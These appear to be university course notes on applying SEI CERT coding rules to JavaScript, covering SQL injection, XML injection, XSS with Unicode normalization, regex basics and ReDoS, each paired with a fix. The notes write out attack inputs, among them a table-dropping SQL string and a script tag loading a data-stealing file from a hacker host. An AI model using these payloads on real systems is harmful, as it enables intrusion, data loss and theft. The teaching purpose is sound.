50.003 - Code Standards¶

Learning Outcomes¶

By the end of this unit, you should be able to

Apply the SEI CERT Java Coding Standard to improve the security of a software system

Coding Standard¶

A coding standard is a common guideline for a group of software engineers to follow so as to

have a uniform structure of most of the codes
improve readability
improve referenceability
improve maintainability
minimize exploitability

For example, we find

https://google.github.io/styleguide/
https://wiki.sei.cmu.edu/confluence/display/java/SEI+CERT+Oracle+Coding+Standard+for+Java

SEI CERT Java Coding Standard¶

Let's take the SEI CERT Java Coding Standard as an example. It consists of a set of rules which are meant to provide normative requirements for code. Each rule is associated with metrics for severity (low, medium, and high), likelihood (unlikely, probable, and likely) and remediation cost (high, medium, and low). Conformance to a rule can be determined through automated analysis (either static or dynamic), formal methods, or manual inspection techniques.

For example, we find a subset of the rules as follows,

Input validation and data sanitization
Object-orientation (not directly relevant for now since we focus on JavaScript, but you are strongly encouraged to read up on it)
Locking and thread-safety (covered in an earlier unit in week 6)
Visibility and atomicity (not covered in this course)

Although these coding standards are set for Java and our main language for the module is JavaScript, we will discuss those that are applicable to both languages.

Input Validation and Data Sanitization¶

Many programs accept untrusted data originating from unvalidated users, network connections, and other untrusted sources and then pass the (modified or unmodified) data across a trust boundary to a different trusted domain. Such data must be sanitized.

For example, we find the following rules in this category

IDS00-J. Sanitize untrusted data passed across a trust boundary
IDS01-J. Normalize strings before validating them
IDS11-J. Eliminate non-character code points before validation

IDS00-J. Sanitize untrusted data passed across a trust boundary¶

The main idea is simple: given data provided by a third party, we should sanitize it to ensure that it is not malicious.

SQL Injection¶

An example of an attack that exploits such data is SQL injection.

Suppose we have the following code

async function login(db, un, pw) {
    // await is only allowed inside an async function
    const [rows] = await db.pool.query(`
            SELECT * FROM db_user WHERE username='${un}' AND password='${pw}' 
        `);
    let found = false;
    if (rows.length > 0) {
        found = true;
    }
    return found;
}

Function login takes a database connection object db, the username un and the password pw, and tries to find the user record in the db_user table. Note that un and pw are input strings provided by external parties, which include both normal and malicious users. If a malicious user sets un to "" and pw to "' OR '0'='0", the query becomes

SELECT * FROM db_user WHERE username='' AND password='' OR '0' = '0';

which always returns all the records from the db_user table. As a result, the user can log in without giving a valid user name and password.

In the worst case, a malicious user could give the input un = "" and pw = "'; drop table db_user; --". If the database driver permits several statements in one query, the query becomes

SELECT * FROM db_user WHERE username='' AND password=''; drop table db_user; --'

As a result, the db_user table is dropped and all its records are deleted.
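Both attacks can be reproduced without a database by looking at the query text alone. The sketch below uses a hypothetical helper buildUnsafeQuery (not part of the code above) that performs the same string interpolation as login and prints the resulting SQL.

```javascript
// Hypothetical helper: builds the query text the same way the vulnerable
// login() does, so that the final SQL string can be inspected.
function buildUnsafeQuery(un, pw) {
    return `SELECT * FROM db_user WHERE username='${un}' AND password='${pw}'`;
}

// A normal user: both inputs stay inside the quotes.
console.log(buildUnsafeQuery("alice", "s3cret"));

// A malicious user: the quote in pw closes the string literal early,
// so the rest of pw is interpreted as SQL rather than as data.
console.log(buildUnsafeQuery("", "' OR '0'='0"));
console.log(buildUnsafeQuery("", "'; drop table db_user; --"));
```

The point of the sketch is that the database only ever sees one string, so it cannot tell which parts came from the programmer and which from the user.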

To prevent SQL injection attacks, a Prepared Statement should be used.

async function login(db, un, pw) {
    // the query text and the untrusted values are passed separately
    const [rows] = await db.pool.query(`
            SELECT * FROM db_user WHERE username= ? AND password= ? 
        `, [un, pw]);
    let found = false;
    if (rows.length > 0) {
        found = true;
    }
    return found;
}

In the updated version above, we use an overloaded query() that takes the statement and a list of parameter values, which defines a prepared statement. The ? placeholders allow the programmer to indicate where the untrusted input should be inserted. Via the prepared statement, the untrusted input strings are sanitized before being inserted into the statement, so they are always treated as data and can't change the structure of the query.

XML Injection¶

Besides SQL injection, untrusted XML data fragments pose a threat to system security too.

Consider the following JavaScript program

function addIPhone(qty) {
    const doc = `<item>
        <description>iPhone X</description>
        <price>999.0</price> 
        <quantity>${qty}</quantity> 
        </item>`;
    addToCart(doc);
}

When a normal user invokes the above function with qty = "1", the resulting XML document

<item>
    <description>iPhone X</description>
    <price>999.0</price>
    <quantity>1</quantity>
</item>

which captures the user's shopping item, will be processed by the addToCart() function.

Suppose a malicious user invokes the function with a rigged input qty = "1</quantity><price>1.0</price><quantity>1" which results in the following XML document

<item>
    <description>iPhone X</description>
    <price>999.0</price>
    <quantity>1</quantity>
    <price>1.0</price>
    <quantity>1</quantity>
</item>

If the addToCart() function processes the elements top-to-bottom in order, it might override the price value 999.0 with 1.0.

The fix to this issue is similar to the one for SQL injection. What is required is to sanitize the input string before embedding it into the XML template, which is treated as trusted data.
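A minimal sketch of such sanitization, assuming that a quantity must be a whole number of at most four digits. The names isValidQuantity, escapeXml and buildIPhoneItem are hypothetical and only serve the illustration; the last one returns the document instead of calling addToCart().

```javascript
// Hypothetical whitelist check: accept only one to four ASCII digits.
function isValidQuantity(qty) {
    return /^[0-9]{1,4}$/.test(qty);
}

// Hypothetical escaping helper for free-text values (e.g. a description)
// that cannot be restricted to a whitelist.
function escapeXml(text) {
    return text
        .replace(/&/g, "&amp;")   // must come first, or it re-escapes the others
        .replace(/</g, "&lt;")
        .replace(/>/g, "&gt;")
        .replace(/"/g, "&quot;")
        .replace(/'/g, "&apos;");
}

// Builds the item document only when the input passes validation.
function buildIPhoneItem(qty) {
    if (!isValidQuantity(qty)) {
        throw new Error("invalid quantity");
    }
    return `<item>
        <description>iPhone X</description>
        <price>999.0</price>
        <quantity>${qty}</quantity>
        </item>`;
}
```

With this check the rigged input from above is rejected before it reaches the template, while "1" is still accepted.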

IDS01-J. Normalize strings before validating them¶

Cross Site Scripting¶

The third example of a security loophole caused by using untrusted data in a trusted context is Cross Site Scripting.

Consider the following app

app.use('/', (req,res) => {
    let msg = dbmodel.getOne();
    res.send(
        `<div> the message is </div> <div> ${msg} </div>`
    );
})

Suppose the message created by some normal user and recorded in the database is "hello". The above route handler returns

<div> the message is </div>
<div> hello </div>

However, the threat surfaces when the message retrieved from the database is "<script src='http://hacker-network.io/stealuserinfo.js' type='text/javascript'></script> ", as the resulting HTML document becomes

<div> the message is </div>
<div> <script src='http://hacker-network.io/stealuserinfo.js' type='text/javascript'></script> </div>

When this document is rendered in the victim's browser, the hacker's script is executed and can extract information from the victim's machine.

One way to address this issue is to sanitize the record retrieved from the database

app.use('/', (req,res) => {
    let msg = dbmodel.getOne();
    const regex = /<.*>/g;
    let html = "";
    if (msg.match(regex)) {
        html = "<div> the message contains some illegal characters </div>";
    } else {
        html = `<div> the message is </div> <div> ${msg} </div>`;
    }
    res.send(html);
})

However, this might not cover all edge cases. Suppose the malicious user uses Unicode variants of < and >, namely \uFE64 and \uFE65. The regex does not match these characters, so the check passes.

This motivates the need to normalize such Unicode variants into their ASCII representation before sanitization.

app.use('/', (req,res) => {
    // normalize once, then validate and output the same normalized string
    const msg = dbmodel.getOne().normalize('NFKC');
    const regex = /<.*>/g;
    let html = "";
    if (msg.match(regex)) {
        html = "<div> the message contains some illegal characters </div>";
    } else {
        html = `<div> the message is </div> <div> ${msg} </div>`;
    }
    res.send(html);
})
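The effect of the normalization step can be checked in isolation. The sketch below uses a hypothetical helper containsTag and a made-up payload in which < and > are replaced by \uFE64 and \uFE65.

```javascript
// No g flag here: test() on a global regex keeps state in lastIndex.
const tagRegex = /<.*>/;

// Hypothetical helper: reports whether the text contains something tag-like.
function containsTag(text) {
    return tagRegex.test(text);
}

// A script tag written with U+FE64 and U+FE65 instead of < and >.
const disguised = "\uFE64script\uFE65alert(1)\uFE64/script\uFE65";

console.log(containsTag(disguised));                    // false
console.log(containsTag(disguised.normalize("NFKC")));  // true
console.log(disguised.normalize("NFKC"));               // <script>alert(1)</script>
```

NFKC maps each compatibility character to its plain equivalent, which is why the check has to run on the normalized string.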

Using Regex to sanitize input¶

A regular expression (regex) is a commonly used domain-specific language for string and data matching. It has a compact syntax and a fairly lightweight implementation. Most languages come with library support for regex. For instance, in JavaScript, we use the following statement to define a regex object.

const re = /ab+c/

or

const re = new RegExp("ab+c")

Then we can run it using

console.log("abbbbc".match(re));

Here are some basic examples of constructing regex pattern.

Matching a single expression¶

const r1 = /a/;  // match one
"aaa".match(r1); // [ 'a', index: 0, input: 'aaa', groups: undefined ]

In the above code snippet, r1 is a regex that matches the character a. In the second line, we match the input string aaa against the pattern. The result contains the part that the regex matches, which is 'a', together with its index, the input and the groups, if any. Note that it only searches for the pattern once in the input string.

Matching a single expression globally¶

If we want to apply the regex to look for matches "globally" over the input, we define

const r2 = /a/g; // match everywhere
"aaa".match(r2); // [ 'a', 'a', 'a' ]

Case insensitivity¶

If we would like to ignore case sensitivity during the match, we add i to the flags field.

const r3 = /a/ig; // match everywhere case insensitively 
"aAa".match(r3); // [ 'a', 'A', 'a' ]

Anchored match¶

Sometimes we would like the regex to match the input exactly, from its start to its end.

const r4 = /^a$/; // match exact from the start to the end;
"aaa".match(r4);  // null

In the above ^ denotes the starting of the input and $ denotes the ending.
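Anchors matter when a regex is used for validation, because without them a match anywhere in the input is enough. A small sketch, with a hypothetical username rule (3 to 16 letters, digits or underscores) chosen only for illustration:

```javascript
const loose = /[A-Za-z0-9_]{3,16}/;     // a valid-looking part anywhere is enough
const strict = /^[A-Za-z0-9_]{3,16}$/;  // the whole input must be valid

const candidate = "bob'; drop table db_user; --";

console.log(loose.test(candidate));   // true, because "bob" alone satisfies the pattern
console.log(strict.test(candidate));  // false
console.log(strict.test("bob_01"));   // true
```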

Character class match¶

If we want to match a set of alternative characters, we use

const r5 = /[ab]/g; // match everywhere with character group, a or b 
"abb".match(r5);  // [ 'a', 'b', 'b' ]

Note that if we use a ^ in a [] it means not, e.g. /[^ab]/ means match any character except for a and b.
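A short sketch of the negated character class, using a hypothetical name r5n:

```javascript
const r5n = /[^ab]/g; // match every character that is neither a nor b
console.log("abcab!".match(r5n)); // [ 'c', '!' ]
console.log("abab".match(r5n));   // null, since no character qualifies
```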

Kleene's star¶

Kleene's star allows us to repeat a sub-regex pattern zero or more times. (Note this is different from the global flag g, which produces a list of matches.)

const r6 = /a*/ // repetition, zero or more
"aaa".match(r6);  // [ 'aaa', index: 0, input: 'aaa', groups: undefined ]

Reference group¶

Sometimes, we would like to match and extract parts of the input. We use parentheses to mark the sub-part that we would like to extract.

const r7 = /a(a*)/ // match and extract into groups 
"aaa".match(r7);  // [ 'aaa', 'aa', index: 0, input: 'aaa', groups: undefined ]

In the above, we match the whole input and extract the remaining a's after the first a.

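Note that a reference group over a Kleene's star can be combined with the global flag, but the result may be surprising. With the g flag, match() returns only the full matches and drops the extracted groups. Since a* also matches the empty string, the result contains an extra empty match at the end of the input.

const r8 = /(a*)/g // valid, but match() drops the groups
"aaa".match(r8);  // [ 'aaa', '' ]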
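When both the global flag and the extracted groups are needed, String.prototype.matchAll can be used instead of match. A minimal sketch, with a hypothetical pattern r7g and input:

```javascript
const r7g = /a(b*)/g; // global flag together with a reference group

// matchAll returns an iterator of match objects, one per match,
// and each of them still carries its extracted groups.
const results = [..."abbab".matchAll(r7g)].map((m) => ({
    full: m[0],
    group: m[1],
    index: m.index,
}));

console.log(results);
// [ { full: 'abb', group: 'bb', index: 0 }, { full: 'ab', group: 'b', index: 3 } ]
```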

More on repetition¶

Besides Kleene's star, we have the following operators that define different constraints on repetition.

const r9 = /a+/ // repetition, one or more
const r10 = /a{2,}/ // repetition, two or more
const r11 = /a{2,3}/ // repetition, two or three
const r12 = /a{3}/ // repetition, exactly three
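Applied to a sample input of four a's (an arbitrary choice for illustration), the operators behave as follows:

```javascript
const sample = "aaaa";
console.log(sample.match(/a+/)[0]);      // 'aaaa'
console.log(sample.match(/a{2,}/)[0]);   // 'aaaa'
console.log(sample.match(/a{2,3}/)[0]);  // 'aaa', greedy but at most three
console.log(sample.match(/a{3}/)[0]);    // 'aaa'
console.log("a".match(/a{2,}/));         // null, fewer than two
```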

Pitfall of using Regex as input sanitizer¶

There are many different algorithms for implementing regex matching. Unfortunately, many existing libraries use a back-tracking approach when performing the match. This leads to a possible security threat to the software system, e.g.

const evil = /^(a*)*h$/
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa".match(p);

The above takes a substantial amount of time to finish because of the nested Kleene's star in (a*)*. Since the input does not end with h, the back-tracking algorithm keeps back-tracking and searching for an alternative way to satisfy the match with the ending h character, and there are exponentially many paths to back-track through.

In general, a regex is problematic when a repeatable sub-pattern is nested inside another repetition and can match the same input (including the empty input) in more than one way. Such a regex is classified as an evil regular expression.
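One mitigation is to rewrite the pattern without the nested repetition. (a*)* and a* accept exactly the same strings, so the sketch below accepts the same inputs as /^(a*)*h$/ but leaves the matcher only one way to consume each a. Capping the input length before matching is an additional safeguard. The names safe, MAX_LEN and matchesSafely are hypothetical, and the limit of 1000 is an arbitrary assumption.

```javascript
const safe = /^a*h$/;   // same accepted strings as /^(a*)*h$/, no nested star
const MAX_LEN = 1000;   // hypothetical limit, to be tuned for the application

function matchesSafely(text) {
    if (text.length > MAX_LEN) {
        return false;   // reject oversized input before running the regex
    }
    return safe.test(text);
}

console.log(matchesSafely("a".repeat(42)));        // false, and it returns quickly
console.log(matchesSafely("a".repeat(42) + "h"));  // true
```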

For more details, refer to

https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS